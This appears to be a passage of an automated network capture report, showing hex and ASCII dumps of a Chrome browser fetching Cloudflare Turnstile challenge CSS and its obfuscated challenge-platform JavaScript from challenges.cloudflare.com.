                                                          Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 28 31 2e 35 29 3b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 7d 0a 20 20 31 30 30 25 20 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 32 29 3b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 7d 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 66 69 72 65 77 6f 72 6b 20 7b 0a 20 20 30 25 20 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 38 3b 20 2f 2a 20 6c 65 6e 67 74 68 20 2a 2f 0a 20 20 7d 0a 20 20 33 30 25 20 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 7d 0a 20 20 31 30 30 25 20 7b 0a 20 20 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 2d 38 3b 20 2f 2a 20 6c 65 6e 67 74 68 20 2a 2f 0a 20 20 7d 0a 7d 0a 40
                                                          Data Ascii: (1.5); opacity: 1; } 100% { transform: scale(2); opacity: 0; }}@keyframes firework { 0% { opacity: 0; stroke-dashoffset: 8; /* length */ } 30% { opacity: 1; } 100% { stroke-dashoffset: -8; /* length */ }}@
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 65 78 3b 0a 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 36 70 78 20 30 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 0a 23 73 70 69 6e 6e 65 72 2d 69 63 6f 6e 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 35 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 0a 7d 0a 0a 23 66 61 69 6c 2d 69 63 6f 6e 2c 20 23 6f 76 65 72 72 75 6e 2d 69 63 6f 6e 20 7b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78
                                                          Data Ascii: ex; flex-direction: column; margin: 0 16px 0 0; text-align: right;}#spinner-icon { display: flex; width: 30px; height: 30px; animation: spin 5s linear infinite;}#fail-icon, #overrun-icon { width: 30px; height: 30px; display: flex
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 30 33 38 31 32 37 3b 0a 20 20 66 69 6c 6c 3a 20 23 30 33 38 31 32 37 3b 0a 7d 0a 0a 23 6f 76 65 72 72 75 6e 2d 74 65 78 74 2c 0a 23 74 69 6d 65 6f 75 74 2d 74 65 78 74 2c 0a 23 65 78 70 69 72 65 64 2d 74 65 78 74 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 69 6e 68 65 72 69 74 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 7d 0a 0a 23 74 69 6d 65 6f 75 74 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 2c 0a 23 65 78 70 69 72 65 64 2d 74 65 78 74 2c 0a 23 74 69 6d 65 6f 75 74 2d 74 65 78 74 2c 0a 23 65 78 70 69 72 65 64 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 2c 0a 23 6f
                                                          Data Ascii: terlimit: 10; stroke: #038127; fill: #038127;}#overrun-text,#timeout-text,#expired-text { margin: 0; text-align: inherit; font-size: 14px; font-weight: 400;}#timeout-refresh-link,#expired-text,#timeout-text,#expired-refresh-link,#o
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 76 69 73 69 74 65 64 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72
                                                          Data Ascii: k,.theme-dark #challenge-error-text a:visited,.theme-dark #challenge-error-text a:link { color: #bbb;}.theme-dark #challenge-overlay a:hover, .theme-dark #challenge-overlay a:active, .theme-dark #challenge-overlay a:focus,.theme-dark #challenge-err
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 74 65 72 6d 73 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 39 37 39 37 39 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 33 32 33 32 33 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 71 72 20 7b 0a 20 20 66 69 6c 6c 3a 20 72 67 62 28 32 34 33 2c 20 31 32 38 2c 20 33 32 29 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 20 7b 0a 20 20 66 69 6c 6c 3a 20 23 66 66 66 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f
                                                          Data Ascii: .theme-dark #terms a:focus { color: #949494;}.theme-dark #content { border-color: #797979; background-color: #232323;}.theme-dark #qr { fill: rgb(243, 128, 32);}.theme-dark .logo-text { fill: #fff;}.theme-dark #fr-helper-loop-link { co
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 61 32 39 39 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 61 32 39 39 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 3a 6c 69 6e 6b 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 61 32 39 39 3b 0a 7d 0a 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 7b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 74 6f 70 3a 20 30 3b 0a 20 20 7a 2d
                                                          Data Ascii: }.theme-dark .error-message { color: #ffa299;}.theme-dark .error-message a { color: #ffa299;}.theme-dark .error-message a:link, .theme-dark .error-message a:visited { color: #ffa299;}#challenge-overlay { position: absolute; top: 0; z-
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 77 69 64 74 68 3a 20 32 34 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 61 63 74 69 76 65 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b
                                                          Data Ascii: margin: 0; cursor: pointer; width: 24px; height: 24px;}.cb-lb input:active ~ .cb-i { border: 2px solid #c44d0e;}.cb-lb input:checked ~ .cb-i { transform: rotate(0deg) scale(1); opacity: 1; border-radius: 5px; background-color: white;
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 61 6e 64 69 6e 67 20 7b 0a 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 72 6f 77 2d 72 65 76 65 72 73 65 20 77 72 61 70 3b 0a 20 20 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 66 6c 65 78 2d 73 74 61 72 74 3b 0a 20 20 61 6c 69 67 6e 2d 73 65 6c 66 3a 20 66 6c 65 78 2d 65 6e 64 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 32 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 71 72 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 73 69 7a
                                                          Data Ascii: anding { flex-flow: row-reverse wrap; place-content: center flex-start; align-self: flex-end; margin: 0 12px; padding-right: 0; text-align: right;}.size-compact #terms { text-align: right;}.size-compact #qr { text-align: center;}.siz


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.449759104.18.94.414431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:40 UTC730OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8b9f6497ee820fa4&lang=auto HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/idxkc/0x4AAAAAAAhuDbq9Zssi-YOu/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:10:40 UTC331INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:10:40 GMT
                                                          Content-Type: application/javascript; charset=UTF-8
                                                          Content-Length: 114313
                                                          Connection: close
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f649c08c31809-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-08-27 22:10:40 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 5a 63 51 66 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c
                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.ZcQf2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcl
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 64 5f 64 6f 6d 61 69 6e 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 64 6f 6d 61 69 6e 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32
                                                          Data Ascii: d_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 2d 70 61 72 73 65 49 6e 74 28 67 48 28 31 37 34 39 29 29 2f 31 30 2b 70 61 72 73 65 49 6e 74 28 67 48 28 31 33 36 34 29 29 2f 31 31 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 38 36 35 31 36 30 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 38 36 35 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 4a 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 67 4a 3d 67 49 2c 67 3d 7b 7d 2c 67 5b 67 4a 28 38 39 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 2b 73 7d 2c 68 3d 67 2c 6d 2c 6a 3d 33 32 2c 6c 3d 68 5b 67 4a 28 38 39 30 29 5d
                                                          Data Ascii: -parseInt(gH(1749))/10+parseInt(gH(1364))/11,d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,865160),eM=this||self,eN=eM[gI(865)],eO=function(f,gJ,g,h,i,j,k,l,m){for(gJ=gI,g={},g[gJ(890)]=function(n,s){return n+s},h=g,m,j=32,l=h[gJ(890)]
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 44 63 58 7a 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 75 6f 4a 79 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4a 55 76 71 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 56 53 50 62 43 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 77 76 49 6b 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 4a 77 6c 79 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 78 54 79 4c 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20
                                                          Data Ascii: on(h,i){return i&h},'DcXzA':function(h,i){return i|h},'uoJyq':function(h,i){return h(i)},'JUvqk':function(h,i){return h>i},'VSPbC':function(h,i){return h!=i},'wvIkD':function(h,i){return i*h},'Jwlyo':function(h,i){return h<i},'xTyLr':function(h,i){return
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 67 52 28 31 32 30 37 29 5d 28 29 7d 2c 31 65 33 29 2c 49 5b 67 50 28 31 32 32 33 29 5d 5b 67 50 28 31 37 36 37 29 5d 28 67 50 28 36 34 39 29 2c 54 29 3b 65 6c 73 65 20 69 66 28 4e 3d 6a 5b 67 50 28 31 30 38 30 29 5d 28 4d 29 2c 4f 62 6a 65 63 74 5b 67 50 28 37 33 38 29 5d 5b 67 50 28 31 35 38 31 29 5d 5b 67 50 28 31 32 39 33 29 5d 28 44 2c 4e 29 7c 7c 28 44 5b 4e 5d 3d 48 2b 2b 2c 45 5b 4e 5d 3d 21 30 29 2c 4f 3d 46 2b 4e 2c 4f 62 6a 65 63 74 5b 67 50 28 37 33 38 29 5d 5b 67 50 28 31 35 38 31 29 5d 5b 67 50 28 31 32 39 33 29 5d 28 44 2c 4f 29 29 46 3d 4f 3b 65 6c 73 65 20 69 66 28 64 5b 67 50 28 31 35 30 37 29 5d 28 67 50 28 31 31 38 39 29 2c 67 50 28 31 31 38 39 29 29 29 7b 69 66 28 4f 62 6a 65 63 74 5b 67 50 28 37 33 38 29 5d 5b 67 50 28 31 35 38 31 29
                                                          Data Ascii: gR(1207)]()},1e3),I[gP(1223)][gP(1767)](gP(649),T);else if(N=j[gP(1080)](M),Object[gP(738)][gP(1581)][gP(1293)](D,N)||(D[N]=H++,E[N]=!0),O=F+N,Object[gP(738)][gP(1581)][gP(1293)](D,O))F=O;else if(d[gP(1507)](gP(1189),gP(1189))){if(Object[gP(738)][gP(1581)
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 37 39 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 65 6c 73 65 20 72 65 74 75 72 6e 27 27 7d 65 6c 73 65 7b 66 6f 72 28 50 3d 31 2c 43 3d 30 3b 64 5b 67 50 28 31 33 30 33 29 5d 28 43 2c 49 29 3b 4b 3d 64 5b 67 50 28 31 32 34 30 29 5d 28 4b 3c 3c 31 2e 34 37 2c 50 29 2c 64 5b 67 50 28 31 36 34 35 29 5d 28 4c 2c 6f 2d 31 29 3f 28 4c 3d 30 2c 4a 5b 67 50 28 31 31 31 39 29 5d 28 64 5b 67 50 28 38 37 39 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3d 30 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46 5b 67 50 28 31 32 38 36 29 5d 28 30 29 2c 43 3d 30 3b 31 36 3e 43 3b 4b 3d 64 5b 67 50 28 31 38 31 37 29 5d 28 4b 2c 31 29 7c 64 5b 67 50 28 36 32 39 29 5d 28 50 2c 31 29 2c 4c 3d 3d 6f 2d 31 3f 28 4c 3d 30 2c 4a 5b
                                                          Data Ascii: 79)](s,K)),K=0):L++,P>>=1,C++);}else return''}else{for(P=1,C=0;d[gP(1303)](C,I);K=d[gP(1240)](K<<1.47,P),d[gP(1645)](L,o-1)?(L=0,J[gP(1119)](d[gP(879)](s,K)),K=0):L++,P=0,C++);for(P=F[gP(1286)](0),C=0;16>C;K=d[gP(1817)](K,1)|d[gP(629)](P,1),L==o-1?(L=0,J[
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 46 29 2c 46 3c 3c 3d 31 29 3b 4f 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 55 28 31 33 37 34 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 64 5b 67 55 28 31 38 34 35 29 5d 28 46 2c 4b 29 3b 4e 3d 48 26 47 2c 48 3e 3e 3d 31 2c 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 64 5b 67 55 28 31 30 37 35 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 67 55 28 31 30 35 30 29 5d 28 64 5b 67 55 28 39 32 37 29 5d 28 30 2c 4e 29 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 4f 3d 64 5b 67 55 28 38 37 39 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4f 2c 44 5b 67 55 28 31 31 31 39 29 5d 28 4f 29 3b 3b 29 7b 69 66 28 49 3e 69 29 72 65 74 75 72
                                                          Data Ascii: F),F<<=1);O=e(J);break;case 1:for(J=0,K=Math[gU(1374)](2,16),F=1;d[gU(1845)](F,K);N=H&G,H>>=1,0==H&&(H=j,G=d[gU(1075)](o,I++)),J|=d[gU(1050)](d[gU(927)](0,N)?1:0,F),F<<=1);O=d[gU(879)](e,J);break;case 2:return''}for(E=s[3]=O,D[gU(1119)](O);;){if(I>i)retur
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 74 75 72 6e 20 47 28 48 2c 49 29 7d 2c 27 72 62 58 6b 48 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 7d 2c 6e 75 6c 6c 3d 3d 3d 68 7c 7c 76 6f 69 64 20 30 3d 3d 3d 68 29 72 65 74 75 72 6e 20 6a 3b 66 6f 72 28 78 3d 65 55 28 68 29 2c 67 5b 67 59 28 36 30 37 29 5d 5b 67 59 28 31 30 30 35 29 5d 26 26 28 78 3d 78 5b 67 59 28 31 35 30 39 29 5d 28 67 5b 67 59 28 36 30 37 29 5d 5b 67 59 28 31 30 30 35 29 5d 28 68 29 29 29 2c 78 3d 67 5b 67 59 28 35 30 39 29 5d 5b 67 59 28 37 34 38 29 5d 26 26 67 5b 67 59 28 35 34 31 29 5d 3f 67 5b 67 59 28 35 30 39 29 5d 5b 67 59 28 37 34 38 29 5d 28 6e 65 77 20 67 5b 28 67 59 28 35 34 31 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 68 30 2c 48 29 7b 66 6f 72 28 68 30 3d 67 59 2c
                                                          Data Ascii: turn G(H,I)},'rbXkH':function(G,H){return G+H}},null===h||void 0===h)return j;for(x=eU(h),g[gY(607)][gY(1005)]&&(x=x[gY(1509)](g[gY(607)][gY(1005)](h))),x=g[gY(509)][gY(748)]&&g[gY(541)]?g[gY(509)][gY(748)](new g[(gY(541))](x)):function(G,h0,H){for(h0=gY,
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 32 28 31 39 30 31 29 5d 28 27 6f 2e 27 2c 6e 29 7d 29 7d 2c 65 4d 5b 67 49 28 31 35 33 39 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 49 28 31 35 38 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 6e 29 7b 69 66 28 68 6e 3d 67 49 2c 65 4d 5b 68 6e 28 31 35 33 39 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 68 6e 28 31 35 33 39 29 5d 3d 21 21 5b 5d 7d 2c 66 33 3d 30 2c 65 4e 5b 67 49 28 36 30 33 29 5d 3d 3d 3d 67 49 28 31 36 30 30 29 3f 65 4e 5b 67 49 28 39 36 31 29 5d 28 67 49 28 31 34 35 35 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 36 2c 30 29 7d 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 66 36 2c 30 29 2c 65 4d 5b 67 49 28 31 36 30 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 68 4b 2c 65 29 7b 65 3d 28 68 4b 3d 67 49 2c 7b 27 66 56 66 69 52 27 3a
                                                          Data Ascii: 2(1901)]('o.',n)})},eM[gI(1539)]=![],eM[gI(1587)]=function(hn){if(hn=gI,eM[hn(1539)])return;eM[hn(1539)]=!![]},f3=0,eN[gI(603)]===gI(1600)?eN[gI(961)](gI(1455),function(){setTimeout(f6,0)}):setTimeout(f6,0),eM[gI(1603)]=function(c,hK,e){e=(hK=gI,{'fVfiR':
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 43 5b 69 69 28 31 33 34 31 29 5d 3d 32 35 30 30 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 43 5b 69 69 28 39 38 32 29 5d 28 73 2c 6d 2c 21 21 5b 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 43 5b 69 69 28 39 38 36 29 5d 28 69 69 28 35 35 30 29 2c 69 69 28 31 37 30 31 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 43 5b 69 69 28 31 35 35 35 29 5d 28 6a 5b 69 69 28 31 35 38 35 29 5d 28 27 76 5f 27 2c 65 4d 5b 69 69 28 31 36 34 37 29 5d 5b 69 69 28 31 38 38 30 29 5d 29 2b 27 3d 27 2b 6e 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 69 66 28 21 43 29 72 65 74 75 72 6e 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 38 27 3a 73 3d 6a 5b 69 69 28 36 38 31 29 5d 3b 63 6f 6e
                                                          Data Ascii: tinue;case'3':C[ii(1341)]=2500;continue;case'4':C[ii(982)](s,m,!![]);continue;case'5':C[ii(986)](ii(550),ii(1701));continue;case'6':C[ii(1555)](j[ii(1585)]('v_',eM[ii(1647)][ii(1880)])+'='+n);continue;case'7':if(!C)return;continue;case'8':s=j[ii(681)];con


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.449761104.18.94.414431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
